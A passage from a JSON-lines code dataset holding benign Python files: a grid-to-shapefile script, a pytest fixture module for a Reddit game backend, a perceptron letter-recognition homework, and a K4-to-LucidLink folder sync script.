{"api_name": "rest_framework.decorators.action", "line_number": 80, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 93, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 108, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 117, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status", "line_number": 122, "usage_type": "name"}, {"api_name": "rest_framework.status", "line_number": 124, "usage_type": "name"}, {"api_name": "rest_framework.status", "line_number": 126, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 129, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 135, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 140, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 143, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 143, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 148, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 148, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 153, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 153, "usage_type": "name"}]} +{"seq_id": "14534065577", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis Scipt load an .nc grid \nWrite a shapefiles of the Edges and one of w node depth\n\n\"\"\"\n\nfrom stompy.grid import unstructured_grid\nimport matplotlib.pyplot as plt\nfrom stompy.model.delft import dfm_grid\n\n##\nnc_gride='E:/proj/Pescadero/pescadero_model/grids/pesca_butano_v03/pesca_butano_existing_deep_bathy.nc'\n#nc_grida='E:/proj/Pescadero/pescadero_model/grids/pesca_butano_v01/pesca_butano_v01_asbuilt_bathy.nc'\nout_dir = 'E:/proj/Pescadero/GIS_files'\n\n\nge=unstructured_grid.UnstructuredGrid.from_ugrid(nc_gride)\n#ga=unstructured_grid.UnstructuredGrid.from_ugrid(nc_grida)\n\nplt.figure(1).clf()\nge.plot_edges(color='k',lw=0.5)\nge.plot_cells(values=ge.cells_area(), cmap='jet')\n\n\n\n##\n\n# write just the edges as a shapefile.\nge.write_edges_shp(out_dir+'/Mesh/pesca_butano_v03_existing.shp')\n#ga.write_edges_shp(out_dir+'/Mesh/pesca_butano_v01_asbuilt.shp')\n\n\nplt.figure(3).clf()\nge.plot_nodes(values=ge.nodes['node_z_bed'],cmap='jet',vmin=-10,vmax=5)\n#ge.plot_nodes(values=ge.nodes['mesh2d_node_z'],cmap='jet',vmin=-10,vmax=5)\nge.write_nodes_shp(out_dir+'/Mesh/pesca_butano_v03_existing_node_w_depth.shp')\n#ga.write_nodes_shp(out_dir+'/Mesh/pesca_butano_v01_asbuilt_node_w_depth.shp')\n\n#%%\n\n\n\n\n", "repo_name": "rustychris/pescadero_model", "sub_path": "model/sophie_scrips/Make_shp_from_nc.py", "file_name": "Make_shp_from_nc.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "stompy.grid.unstructured_grid.UnstructuredGrid.from_ugrid", "line_number": 20, "usage_type": "call"}, {"api_name": "stompy.grid.unstructured_grid.UnstructuredGrid", "line_number": 20, "usage_type": "attribute"}, {"api_name": "stompy.grid.unstructured_grid", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "42697147093", "text": "import asyncio\nfrom typing import Generator\n\nimport pytest\nimport pytest_asyncio\nfrom asyncpraw import Reddit\nfrom faker import Faker\nfrom httpx import AsyncClient\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlmodel import SQLModel\nfrom starlette.testclient import TestClient\n\nfrom src.clients.reddit.inbox import InboxClient\nfrom src.main import app\nfrom src.models.player import Player\nfrom src.models.subreddit import SubReddit\nfrom src.repositories.game import GameRepository\nfrom src.repositories.player import PlayerRepository\nfrom src.repositories.sqlalchemy import BaseSQLAlchemyRepository\nfrom src.repositories.subreddit import SubRedditRepository\nfrom src.services.base import BaseService\nfrom src.services.game import GameService\nfrom src.services.player import PlayerService\nfrom src.services.subreddit import SubRedditService\nfrom src.services.tag import TagService\nfrom tests.unit import test_redditor_one, test_subreddit\nfrom tests.utils import test_engine\n\n\nfake = Faker()\n\n\n@pytest.fixture(scope=\"module\")\ndef test_app():\n client = TestClient(app)\n yield client # testing happens here\n\n\n@pytest_asyncio.fixture(scope=\"module\")\nasync def async_test_app():\n async with AsyncClient(app=app, base_url=\"http://test\") as client:\n yield client\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop(request) -> Generator: # noqa: indirect usage\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest_asyncio.fixture(scope=\"function\")\nasync def async_session() -> AsyncSession:\n async_test_session = sessionmaker(test_engine, class_=AsyncSession, expire_on_commit=False)\n\n async with async_test_session() as s:\n async with test_engine.begin() as conn:\n await conn.run_sync(SQLModel.metadata.create_all)\n\n yield s\n\n async with test_engine.begin() as conn:\n await conn.run_sync(SQLModel.metadata.drop_all)\n\n await test_engine.dispose()\n\n\n@pytest.fixture\ndef game_repo(async_session: AsyncSession) -> BaseSQLAlchemyRepository:\n return GameRepository(db=async_session)\n\n\n@pytest.fixture\ndef sub_repo(async_session: AsyncSession) -> BaseSQLAlchemyRepository:\n return SubRedditRepository(db=async_session)\n\n\n@pytest.fixture\ndef player_repo(async_session: AsyncSession) -> BaseSQLAlchemyRepository:\n return PlayerRepository(db=async_session)\n\n\n@pytest.fixture\ndef mock_game_service(game_repo: BaseSQLAlchemyRepository) -> BaseService:\n return GameService(repo=game_repo)\n\n\n@pytest.fixture\ndef mock_sub_service(sub_repo: BaseSQLAlchemyRepository) -> BaseService:\n return SubRedditService(repo=sub_repo)\n\n\n@pytest.fixture\ndef mock_player_service(player_repo: BaseSQLAlchemyRepository) -> BaseService:\n return PlayerService(repo=player_repo)\n\n\n@pytest.fixture\ndef mock_tag_service(\n mock_player_service: BaseService, mock_game_service: BaseService, mock_sub_service: BaseService\n) -> TagService:\n return TagService(mock_player_service, mock_game_service, mock_sub_service)\n\n\n# TODO: add base fields here?\n@pytest.fixture\ndef player() -> Player:\n return Player(\n username=test_redditor_one[\"name\"],\n reddit_id=test_redditor_one[\"id\"],\n icon_img=test_redditor_one[\"icon_img\"],\n is_employee=test_redditor_one[\"is_employee\"],\n created_utc=test_redditor_one[\"created_utc\"],\n verified=False,\n is_suspended=False,\n has_verified_email=True,\n )\n\n\n@pytest.fixture\ndef fake_player() -> Player:\n return Player(\n username=fake.first_name().lower(),\n reddit_id=fake.word(),\n icon_img=fake.image_url(),\n is_employee=fake.boolean(),\n created_utc=fake.unix_time(),\n verified=fake.boolean(),\n is_suspended=False,\n has_verified_email=fake.boolean(),\n )\n\n\n@pytest.fixture\ndef it_player() -> Player:\n return Player(\n username=\"iamitplayer\",\n reddit_id=\"testid\",\n icon_img=test_redditor_one[\"icon_img\"],\n is_employee=test_redditor_one[\"is_employee\"],\n created_utc=test_redditor_one[\"created_utc\"],\n verified=False,\n is_suspended=False,\n has_verified_email=True,\n is_it=True,\n )\n\n\n@pytest.fixture\ndef subreddit() -> SubReddit:\n return SubReddit(\n name=test_subreddit[\"name\"],\n sub_id=test_subreddit[\"id\"],\n display_name=test_subreddit[\"display_name\"],\n created_utc=test_subreddit[\"created_utc\"],\n description=test_subreddit[\"description\"],\n description_html=test_subreddit[\"description_html\"],\n over18=test_subreddit[\"over18\"],\n subscribers=test_subreddit[\"subscribers\"],\n icon_img=test_subreddit[\"icon_img\"],\n )\n\n\n@pytest.fixture\nasync def reddit():\n \"\"\"Mock Reddit instance\"\"\"\n async with Reddit(client_id=\"dummy\", client_secret=\"dummy\", user_agent=\"dummy\") as reddit:\n # Unit tests should never issue requests\n reddit._core.request = dummy_request\n yield reddit\n\n\nasync def dummy_request(*args, **kwargs):\n pass\n\n\n@pytest.fixture\ndef mock_inbox_client(reddit):\n return InboxClient(reddit=reddit)\n", "repo_name": "nickatnight/tag-youre-it-backend", "sub_path": "backend/tests/unit/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 5148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "41", "api": [{"api_name": "faker.Faker", "line_number": 31, "usage_type": "call"}, {"api_name": "starlette.testclient.TestClient", "line_number": 36, "usage_type": "call"}, {"api_name": "src.main.app", "line_number": 36, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "call"}, {"api_name": "httpx.AsyncClient", "line_number": 42, "usage_type": "call"}, {"api_name": "src.main.app", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest_asyncio.fixture", "line_number": 40, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop_policy", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Generator", "line_number": 47, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 55, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 55, "usage_type": "argument"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 55, "usage_type": "name"}, {"api_name": "tests.utils.test_engine.begin", "line_number": 58, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 59, "usage_type": "name"}, {"api_name": "tests.utils.test_engine.begin", "line_number": 63, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 64, "usage_type": "name"}, {"api_name": "tests.utils.test_engine.dispose", "line_number": 66, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 66, "usage_type": "name"}, {"api_name": "pytest_asyncio.fixture", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 54, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 70, "usage_type": "name"}, {"api_name": "src.repositories.game.GameRepository", "line_number": 71, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 69, "usage_type": "attribute"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 75, "usage_type": "name"}, {"api_name": "src.repositories.subreddit.SubRedditRepository", "line_number": 76, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 74, "usage_type": "attribute"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 75, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 80, "usage_type": "name"}, {"api_name": "src.repositories.player.PlayerRepository", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 79, "usage_type": "attribute"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 80, "usage_type": "name"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 85, "usage_type": "name"}, {"api_name": "src.services.game.GameService", "line_number": 86, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 84, "usage_type": "attribute"}, {"api_name": "src.services.base.BaseService", "line_number": 85, "usage_type": "name"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 90, "usage_type": "name"}, {"api_name": "src.services.subreddit.SubRedditService", "line_number": 91, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 89, "usage_type": "attribute"}, {"api_name": "src.services.base.BaseService", "line_number": 90, "usage_type": "name"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 95, "usage_type": "name"}, {"api_name": "src.services.player.PlayerService", "line_number": 96, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src.services.base.BaseService", "line_number": 95, "usage_type": "name"}, {"api_name": "src.services.base.BaseService", "line_number": 101, "usage_type": "name"}, {"api_name": "src.services.tag.TagService", "line_number": 103, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 99, "usage_type": "attribute"}, {"api_name": "src.services.tag.TagService", "line_number": 102, "usage_type": "name"}, {"api_name": "src.models.player.Player", "line_number": 109, "usage_type": "call"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 110, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 111, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 112, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 113, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 114, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 107, "usage_type": "attribute"}, {"api_name": "src.models.player.Player", "line_number": 108, "usage_type": "name"}, {"api_name": "src.models.player.Player", "line_number": 123, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 121, "usage_type": "attribute"}, {"api_name": "src.models.player.Player", "line_number": 122, "usage_type": "name"}, {"api_name": "src.models.player.Player", "line_number": 137, "usage_type": "call"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 140, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 141, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 142, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 135, "usage_type": "attribute"}, {"api_name": "src.models.player.Player", "line_number": 136, "usage_type": "name"}, {"api_name": "src.models.subreddit.SubReddit", "line_number": 152, "usage_type": "call"}, {"api_name": "tests.unit.test_subreddit", "line_number": 153, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 154, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 155, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 156, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 157, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 158, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 159, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 160, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 161, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 150, "usage_type": "attribute"}, {"api_name": "src.models.subreddit.SubReddit", "line_number": 151, "usage_type": "name"}, {"api_name": "asyncpraw.Reddit", "line_number": 168, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 165, "usage_type": "attribute"}, {"api_name": "src.clients.reddit.inbox.InboxClient", "line_number": 180, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 178, "usage_type": "attribute"}]} +{"seq_id": "35427846935", "text": "# Robert Kramer\n# Machine Learning Winter 2016\n# Perceptron Neural Network using letter recognition\n# dataset from http://archive.ics.uci.edu/ml/datasets/\n# Letter+Recognition\n\n# Capital letters denote vectors or matrices\n# X is input Matrix (row vectors), W is a weight vector, T is a\n# target vector. \"per\" is short for perceptron\n\n# %%\nimport numpy as np\nimport pandas as pd\nimport itertools\nimport matplotlib.pyplot as plt\n\n\n# %%\n# using dataframe in pandas because of familiarity with R\n# would like help refactoring to a more generalizable form\n# import data; split into train and test; normalize, name, add bias\nlet_rec_df = pd.read_csv('letter-recognition.csv', header=None)\ntrain = let_rec_df.iloc[0:10000, :]\ntest = let_rec_df.iloc[10000:, :]\ndel let_rec_df # Removing for memory\ntrain.columns = ['target', 'x1', 'x2', 'x3', 'x4',\n 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11',\n 'x12', 'x13', 'x14', 'x15', 'x16']\ntest.columns = ['target', 'x1', 'x2', 'x3', 'x4',\n 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11',\n 'x12', 'x13', 'x14', 'x15', 'x16']\ntrain.iloc[:, 1:] = train.iloc[:, 1:]/15\ntest.iloc[:, 1:] = test.iloc[:, 1:]/15\ntrain.insert(1, 'x0', 1) # bias input --> 17 wieghts needed\ntest.insert(1, 'x0', 1)\n# using itertools to generate the 325 perceptron names\n# todo --> gerneralize for any target column\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nper_names = list(itertools.combinations(alphabet, 2))\neta = .2 # given\n\n\n# %%\n# makes a list of column names for perceptron DF.\ndef col_names(per_names):\n col_names = []\n for e in per_names:\n col_names.append(e[0]+e[1])\n return col_names\n\n\n# %%\n# grab_data takes the target from the pernames list and returns the\n# correct subset of the data.\n# input a list element with targets and data. Output dataframe of subset\n# using a boolean array to choose. Could do separate, but this should add\n# some stocasticity and is easier. \"All pairs\" method. sets target to 1, -1\ndef pair_data(per_name_element, training_df):\n tar1 = training_df['target'] == per_name_element[0]\n tar2 = training_df['target'] == per_name_element[1]\n paired_data = training_df[tar1 | tar2]\n return paired_data\n\n\n# %%\n# Takes in paired data and returns a column vector of target answers\ndef get_T(per_name_element, paired_data):\n T = np.empty([len(paired_data), 1])\n for i in range(len(paired_data)):\n if paired_data.iloc[i, 0] == per_name_element[0]:\n T[i] = 1\n else:\n T[i] = -1\n return T\n\n\n# %%\n# returns a matrix X\ndef get_X(paired_data):\n X = paired_data.iloc[:, 1:]\n X = X.as_matrix()\n return X\n\n\n# %%\n# returns a column vector of weights using the size of inputs\n# doesn't change for this dataset. Could hard-code\ndef get_ini_W(X):\n W = np.reshape(np.random.rand(X.shape[1]),\n (X.shape[1], 1))\n W = W*2-1\n return W\n\n\n# %%\n# takes in the xdoty values and replaces them with a target estimate\n# only works with arrays y / abs(y) works better\n# Y is a vector of perceptron predictions \"neuron fire\"\ndef fire(X, W):\n Y = np.dot(X, W)\n Y = Y/abs(Y)\n return Y\n\n\n# %%\n# takes in the target T weights W prediction Y returns accuracy\n# of single perceptron pairwise prediction\ndef accuracy(X, W, T):\n Y = fire(X, W)\n Z = abs((T + Y)/2) # Z is a dummy vector\n acc = sum(Z)/len(Y)\n return acc[0]\n\n\n# %%\n# update weights w if w dot x does not correctly predict t\n# all arrays\ndef train_epoch(eta, W, X, T):\n for i in range(len(X)):\n y = fire(X[i], W)[0]\n if y != T[i][0]:\n W = W + eta*T[i][0]*X[i].reshape(len(X[0]),1) # need Xi as col vec\n i += 1\n return W\n\n\n# %%\n# train a pairwise perceptron\ndef train_perceptron(eta, W, X, T):\n acc = 0\n i = 0\n while accuracy(X, W, T)-acc >= 0 and i < 10:\n # print W[0:3]\n # print acc\n acc = accuracy(X, W, T)\n W = train_epoch(eta, W, X, T)\n i += 1\n return W\n\n\n# %% Make sure a dataframe exist to add weights to\ndef build_network(per_names, eta, training_df):\n network = pd.DataFrame()\n for e in per_names:\n paired_data = pair_data(e, training_df)\n T = get_T(e, paired_data)\n X = get_X(paired_data)\n W = get_ini_W(X)\n W = train_perceptron(eta, W, X, T)\n network[e[0]+e[1]] = W[:, 0]\n return network\n\n\n# %%\n# get trans gives an output of the transformation matrix with the weights\n# multiplied with the X inputs. makes a data frame for easy reading\n# Using to check reasonability. Need to have run the column names\n# could get the names from network instead\ndef get_trans(network, test_data):\n X = get_X(test_data)\n col_names = list(network.columns.values)\n trans = np.dot(X, network)\n trans = pd.DataFrame(data=trans, columns=col_names)\n return trans\n\n\ndef get_trans_fired(network, test_data):\n X = get_X(test_data)\n col_names = list(network.columns.values)\n trans_fired = fire(X, network)\n trans_fired = pd.DataFrame(data=trans_fired, columns=col_names)\n #trans_fired.insert(0, 'target', test_data['target']) # inserts target\n return trans_fired\n\n\n# %% adding the predicted letter for each perceptron\n# takes forever. Okay for a few predictions\ndef get_trans_w_predict(network, test_data):\n trans_fired = get_trans_fired(network, test_data)\n for i in range(len(test_data)):\n j = 0\n for e in network:\n if trans_fired.iloc[i, j] == 1:\n trans_fired.iloc[i, j] = e[0]\n else:\n trans_fired.iloc[i, j] = e[1]\n j += 1\n return trans_fired\n\n\n# %%\n# Voting. The max(set(list), key=list.count) one\n# doesn't randomize ties\ndef pick_winner(predict_list):\n As = predict_list.count('A')\n Bs = predict_list.count('B')\n Cs = predict_list.count('C')\n Ds = predict_list.count('D')\n Es = predict_list.count('E')\n Fs = predict_list.count('F')\n Gs = predict_list.count('G')\n Hs = predict_list.count('H')\n Is = predict_list.count('I')\n Js = predict_list.count('J')\n Ks = predict_list.count('K')\n Ls = predict_list.count('L')\n Ms = predict_list.count('M')\n Ns = predict_list.count('N')\n Os = predict_list.count('O')\n Ps = predict_list.count('P')\n Qs = predict_list.count('Q')\n Rs = predict_list.count('R')\n Ss = predict_list.count('S')\n Ts = predict_list.count('T')\n Us = predict_list.count('U')\n Vs = predict_list.count('V')\n Ws = predict_list.count('W')\n Xs = predict_list.count('X')\n Ys = predict_list.count('Y')\n Zs = predict_list.count('Z')\n count_list = [As, Bs, Cs, Ds, Es, Fs, Gs, Hs, Is, Js, Ks, Ls,\n Ms, Ns, Os, Ps, Qs, Rs, Ss, Ts, Us, Vs, Ws, Xs,\n Ys, Zs]\n # I realize this is an ineffiecient way, but I'm in too deep\n list_map = ['A', 'B', 'C', 'D', 'E', 'F', 'G',\n 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n 'O', 'P', 'Q', 'R', 'S', 'T', 'U',\n 'V', 'W', 'X', 'Y', 'Z']\n var = 0 # place holder\n for i in range(len(count_list)):\n if count_list[i] > count_list[var]:\n var = i\n if count_list[i] == count_list[var]:\n if np.random.randint(0, 2) == 0:\n var = i\n return list_map[var]\n\n\n# %%\n# not working --> returns either A or Z (I don't know why, Does any of it work)\ndef predict(network, test_data):\n X = get_X(test_data)\n fired_per = fire(X, network)\n P = []\n for i in range(len(test_data)):\n j = 0\n predict_list = []\n for e in network:\n if fired_per[i][j] == 1:\n predict_list.append(e[0])\n else:\n predict_list.append(e[1])\n j += 1\n P.append(pick_winner(predict_list))\n #P.append(max(set(predict_list), key=predict_list.count)) # from stack\n return P\n\n\n# %%\n# takes in list of predictions and a series of targets\n# returns accuracy as decimal\ndef predict_accuracy(pred_list, target):\n target = list(target)\n count = 0\n for i in range(len(pred_list)):\n if pred_list[i] == target[i]:\n count += 1\n count = float(count)\n return count/len(target)+0.0\n\n\n# %% np.array for confusion matrix\ndef conf_matrix(pred_list, target):\n target = list(target)\n matrix = np.zeros((26, 26))\n for i in range(len(target)):\n a = matrix[ord(target[i])-ord('A')][ord(pred_list[i])-ord('A')]\n a += 1\n matrix[ord(target[i])-ord('A')][ord(pred_list[i])-ord('A')] = a\n list_map = ['A', 'B', 'C', 'D', 'E', 'F', 'G',\n 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n 'O', 'P', 'Q', 'R', 'S', 'T', 'U',\n 'V', 'W', 'X', 'Y', 'Z']\n matrix = pd.DataFrame(matrix, index=list_map, columns=list_map)\n return matrix\n# %% Running the program. Takes a couple minutes\nnetwork = build_network(per_names, eta, train)\npred_list = predict(network, test)\ntar_series = test['target']\nacc = predict_accuracy(pred_list, tar_series)\nconfusion = conf_matrix(pred_list, test['target'])\nconfusion.to_clipboard()\n", "repo_name": "kramer102/MachineLearning2016", "sub_path": "1-layer-perceptron/Robert_Kramer_hw1.py", "file_name": "Robert_Kramer_hw1.py", "file_ext": "py", "file_size_in_byte": 9118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 162, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 163, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 284, "usage_type": "call"}]} +{"seq_id": "6425259545", "text": "#\n# [K4toLL] Maintain folder structure in LucidLink volume based on layouts in K4\n#\n# K4toLL: 1.0\n#\n# Changelog:\n#\t\t- 1.0 (12th September 2022):\n#\t\t\t- First version\n#\n# Author: Marco Baldassarre \n#\n\nimport json\nimport os\nimport sys\n\nimport pymssql # on Windows, open a cmd and run: py -m pip install pymssql\n\n# import _scproxy # workaround for _iconv error on Mac OS X -- see https://github.com/pymssql/pymssql/issues/705\n\nfrom _configuration import *\n\n# persistence of K4 layouts on local file\ndirs_json_path = os.path.join(os.path.dirname(__file__), 'dirs.json')\nif os.path.isfile(dirs_json_path):\n with open(dirs_json_path, 'r') as f:\n layouts_last_known_directory = json.load(f)\nelse:\n layouts_last_known_directory = {} # empty dict\n\n# loop through all K4 databases configured\nfor mssql_db in mssql_dbs:\n # connect to DB server\n k4db = pymssql._mssql.connect(server=mssql_db['host'],\n user=mssql_username,\n password=mssql_password,\n database=mssql_db['database'])\n\n # fetch rows from table\n k4db.execute_query('''\n\t\tSELECT\n\t\t\tPublication.name as title,\n\t\t\tIssue.name as issueName,\n\t\t\tIssue.idx as issueNumber,\n\t\t\tpublicationDate,\n\t\t\tSection.name as section,\n\t\t\tK4ObjectVariant.id as layoutId,\n\t\t\tK4Object.Name as layoutName\n\t\t\t\t\t\t\n\t\tFROM \n\t\t\tK4Object \n\t\t\tINNER JOIN K4ObjectVariant ON K4Object.id = K4ObjectVariant.K4ObjectID\n\t\t\tINNER JOIN Issue ON K4ObjectVariant.issueID = Issue.id\n\t\t\t\t\t\t\tAND K4ObjectVariant.publicationID = Issue.PublicationID\n\t\t\tINNER JOIN Publication ON Issue.PublicationID = Publication.id\n\t\t\tINNER JOIN Section ON K4ObjectVariant.sectionID = Section.id\n\t\t\n\t\tWHERE \n\t\t\tK4Object.K4ObjectType = 0 AND\n\t\t\t(Issue.type=0 OR Issue.type=4) AND\n\t\t\tPublication.active=1 AND\n\t\t\tpublicationDate IS NOT NULL AND \n\t\t\tpublicationDate > CAST(DATEDIFF(s, '1970-01-01 00:00:00', ''' + minimum_publication_date + ''') AS BIGINT)*1000''')\n # K4Object.K4ObjectType = 0 : Layouts only\n\n for k4layout in k4db:\n market_brand_level = publication_name_mapping.get(k4layout['title'])\n if market_brand_level is None:\n print(k4layout['title'], 'not in the mapping dictionary, skipping...', file=sys.stderr)\n continue\n\n year = k4layout['issueName'][0:4]\n layout_id = str(k4layout['layoutId'])\n\n layout_directory = os.path.join(market_brand_level, year, k4layout['issueName'], k4layout['layoutName'])\n layout_last_known_directory = layouts_last_known_directory.get(layout_id)\n\n if layout_last_known_directory is None:\n # new layout, let's create its folders\n\n # create the same structure within Editorial and Repro\n for root_level in ['Editorial', 'Repro']:\n os.makedirs(os.path.join(lucidlink_root, root_level, layout_directory), exist_ok=True)\n\n elif layout_last_known_directory != layout_directory:\n # layout directory needs moving!\n\n # create the same structure within Editorial and Repro\n for root_level in ['Editorial', 'Repro']:\n try:\n os.rename(\n src=os.path.join(lucidlink_root, root_level, layout_last_known_directory),\n dst=os.path.join(lucidlink_root, root_level, layout_directory)\n )\n except FileExistsError:\n # If dst exists, do nothing. It may already have been renamed manually.\n pass\n else:\n # do nothing, as nothing has changed\n pass\n\n # maintain the local dictionary updated\n layouts_last_known_directory[layout_id] = layout_directory\n\n# persistence of K4 layouts on local file\nwith open(dirs_json_path, 'w') as f:\n json.dump(layouts_last_known_directory, f)\n", "repo_name": "mbaldassarre/K4toLL", "sub_path": "K4toLL.py", "file_name": "K4toLL.py", "file_ext": "py", "file_size_in_byte": 3902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 27, "usage_type": "call"}, {"api_name": "pymssql._mssql.connect", "line_number": 34, "usage_type": "call"}, {"api_name": "pymssql._mssql", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 69, 